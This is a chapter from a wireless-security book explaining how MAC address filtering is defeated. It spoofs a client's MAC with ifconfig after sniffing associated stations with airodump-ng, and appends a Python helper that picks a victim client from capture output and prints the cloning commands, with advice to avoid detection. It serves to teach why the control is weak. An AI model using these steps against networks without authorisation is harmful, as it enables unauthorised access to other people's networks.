Chapter 2

Wireless security (half) measures: An overview

Chapter outline:
1. MAC address filtering
2. Disabling ESSID broadcast
3. Limiting wireless coverage
MAC address filtering

A sniffer is an application designed to eavesdrop (or sniff) on network traffic. With it, you may be able to capture any network packet, provided some conditions are met. One of the access point security tactics is enabling MAC address filtering. When you try to authenticate with a network and get no response, it probably means you are out of range of the wireless signal. The other possibility is that the network administrator has enabled the MAC address filtering feature. But how can a black-hat hacker impersonate a legitimate client to access a targeted network? Let's explain this by looking at the hacker's actions step by step.

First, some background. A MAC address is a hardware identifier on a wired or wireless network, much like an IP address identifies a host on the Internet. In theory, every network card has a unique MAC address burned into it. The address is 6 bytes long and is conventionally written as six hexadecimal octets separated by colons (see the example below). Duplicate MAC addresses do occur occasionally, but they are very rare in a WLAN. An ever-widening collection of software lets you set the MAC address to any value you like, so relying on an approved list of hardware addresses as a security silver bullet is unwarranted: the filter checks a value the client reports, not the device itself. Let's see how this countermeasure can be defeated. To spoof a MAC address in Linux, run this command (the interface usually has to be brought down first, because most drivers refuse to change the address of an interface that is up):

# ifconfig wlan1 hw ether 00:0F:B5:34:30:30
The parameters:
ifconfig: the program that configures a network interface (wired or wireless)
wlan1: the wireless network interface name
hw ether: the option that sets the hardware (MAC) address of the interface
00:0F:B5:34:30:30: the new MAC address to set
Right: you now know that a MAC address can be forged, and how to spoof it. But which hardware address should you pick? The new address must be one the access point already allows, that is, the address of a client in the network's approved pool. All you need to do is find out which addresses those are. The tool for the job is airodump-ng (to be precise, a sniffer). The program lists the hardware addresses of stations that are active while it is running. Before you start it, the wireless interface has to be switched to monitor mode. Run this command:

# iwconfig wlan1 mode monitor
The parameters:
wlan1: the wireless network interface name
mode monitor: the mode to set

Airodump-ng can now begin scanning:

# airodump-ng wlan1

The parameters:
airodump-ng: the sniffer name
wlan1: the interface used to monitor wireless activity
Before we go any further, there are some errors that can crop up as early as this stage. If you have not taken care to install the right drivers, your wireless network interface will not switch to monitor mode and the command will return an error. The second command starts the sniffer. Its role is to capture on selected channels (a wireless card can receive on only one channel at a time, so by default airodump-ng hops from channel to channel). The first line of its output shows the currently scanned channel, the elapsed running time and the current date and time. The next line provides titles for each column, and the lines after it show the detected access points. (Only the BSSID column of the listing survives here, and the addresses are partly masked with ## in the original.)

CH 3 ][ Elapsed:
BSSID
00:19:5B:B3:##:##
00:1E:E5:8D:##:##
00:19:E0:A4:##:##
00:15:E9:E4:##:##
00:16:41:8E:##:##

BSSID
00:19:5B:B3:##:##
Here's a quick explanation of the fields:
BSSID: the basic service set identifier; here it is equivalent to the MAC address of the access point
PWR: signal level (power)
Beacons: number of captured beacon frames (the frames that announce the network)
#Data: number of captured data packets
#/s: number of data packets per second, measured over the last 10 seconds
CH: number of the channel used by the network
MB: maximum transfer rate supported by the access point (as specified in the standard)
ENC: encryption in use (OPN/WEP/WPA/WPA2)
CIPHER: cipher in use (WEP/WEP40/WEP104/TKIP/CCMP/WRAP)
AUTH: authentication protocol in use (SKA/PSK/MGT)
ESSID: the wireless network name
The second section lists client stations:
BSSID: the MAC address of the access point the client is associated with (shown as "(not associated)" for clients that are only probing)
STATION: the MAC address of the client
PWR: signal level (its range depends on the card driver; the higher the value, the stronger the signal)
Rate: the station's receive rate followed by its transmit rate
Lost: number of packets lost over the last 10 seconds (inferred from gaps in the sequence numbers)
Packets: number of data packets sent by the client
Probes: the network names (ESSIDs) the client is probing for
The AP list is followed by the client list. The sniffer can only detect clients that were active (transmitting) while it was running. Note the MAC address in the STATION column of a client whose BSSID is that of the target network, and wait for that user to disconnect. If you were to connect at the same time, the network would act up for both users: with two devices sharing one hardware address, frames are delivered to the wrong station and data transmission becomes unreliable. While this could draw the attention of a scrupulous network administrator, users habitually blame it on the 'flaky' nature of the access point, and administrators often believe the problem lies in client misconfiguration.
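The whole procedure above (list the stations airodump-ng saw talking to the target access point, pick one, clone its address once it has left) can be automated around airodump-ng's CSV output. The helper below is an added example, not code from the book: it assumes airodump-ng was run with `-w <prefix> --output-format csv`, whose file layout (an access-point section, a blank line, then a "Station MAC" section) is reproduced in a constructed sample capture. The interface name wlan1 is the chapter's; the helper only prints the ifconfig commands, it does not execute them, and it rejects multicast addresses, which can never belong to a station.

```python
"""Pick a client MAC address that will pass an access point's MAC filter.

Added example (not from the book). Parses the CSV airodump-ng writes with
`-w <prefix> --output-format csv`, lists the stations associated with the
target BSSID (those addresses are, by definition, on the allow list), and
prints the chapter's ifconfig commands for cloning the chosen one. Nothing
here touches the interface; run the printed commands only after the
legitimate client has disconnected.
"""
import re

MAC_RE = re.compile(r"^([0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}$")

# Constructed sample in the layout airodump-ng writes to <prefix>-01.csv
# (two access points, four stations; addresses are made up).
SAMPLE_CSV = """
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:19:5B:B3:AA:01, 2024-03-01 10:00:00, 2024-03-01 10:05:00,  3,  54, WPA2, CCMP, PSK, -41,      210,       12,   0.  0.  0.  0,   6, Office,
00:1E:E5:8D:BB:02, 2024-03-01 10:00:01, 2024-03-01 10:05:00,  6,  54, WEP , WEP , SKA, -67,      180,      500,   0.  0.  0.  0,   5, Guest,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
00:21:5C:11:22:33, 2024-03-01 10:00:10, 2024-03-01 10:04:58, -52,      340, 00:19:5B:B3:AA:01,Office
00:24:D6:44:55:66, 2024-03-01 10:01:00, 2024-03-01 10:05:00, -60,       15, 00:19:5B:B3:AA:01,
00:26:5E:77:88:99, 2024-03-01 10:02:30, 2024-03-01 10:02:31, -80,        3, (not associated) ,Office,Cafe
00:1C:B3:AB:CD:EF, 2024-03-01 10:00:05, 2024-03-01 10:04:00, -70,      120, 00:1E:E5:8D:BB:02,Guest
"""


def parse_stations(csv_text):
    """Return the rows of the 'Station MAC' section as dicts.

    airodump-ng pads fields with spaces and may leave 'Probed ESSIDs' empty
    or list several names separated by commas, so everything after the BSSID
    column is collected as the probe list.
    """
    stations = []
    in_stations = False
    for line in csv_text.splitlines():
        if line.startswith("Station MAC"):
            in_stations = True
            continue
        if not in_stations or not line.strip():
            continue
        fields = [f.strip() for f in line.split(",")]
        if len(fields) < 6 or not MAC_RE.match(fields[0]):
            continue
        stations.append({
            "station": fields[0].upper(),
            "last_seen": fields[2],
            "power": int(fields[3]),
            "packets": int(fields[4]),
            "bssid": fields[5].upper(),   # "(NOT ASSOCIATED)" for probing-only clients
            "probes": [p for p in fields[6:] if p],
        })
    return stations


def clients_of(csv_text, bssid):
    """Stations associated with `bssid`, busiest first.

    Clients that are merely probing are excluded automatically because their
    BSSID column reads '(not associated)' rather than the AP's address.
    """
    bssid = bssid.upper()
    assoc = [s for s in parse_stations(csv_text) if s["bssid"] == bssid]
    return sorted(assoc, key=lambda s: s["packets"], reverse=True)


def spoof_commands(iface, mac):
    """The chapter's ifconfig command, bracketed by down/up: most drivers
    refuse to change the address of an interface that is up."""
    if not MAC_RE.match(mac):
        raise ValueError(f"not a MAC address: {mac!r}")
    if int(mac[:2], 16) & 1:   # I/G bit set: multicast or broadcast, never a station
        raise ValueError(f"group address cannot be a station address: {mac}")
    return [
        f"ifconfig {iface} down",
        f"ifconfig {iface} hw ether {mac}",
        f"ifconfig {iface} up",
    ]


if __name__ == "__main__":
    target = "00:19:5B:B3:AA:01"          # the AP whose filter we want to pass
    candidates = clients_of(SAMPLE_CSV, target)
    for s in candidates:
        print(f"{s['station']}  pwr={s['power']:>4}  packets={s['packets']:>5}  "
              f"last seen {s['last_seen']}")
    chosen = candidates[0]["station"]
    print(f"# wait for {chosen} to disconnect, then run:")
    print("\n".join(spoof_commands("wlan1", chosen)))
```

The "last seen" timestamp is what tells you whether the legitimate client is still around: re-run airodump-ng for a while and clone an address only once its station row has stopped updating, otherwise you create exactly the duplicate-address collision described above.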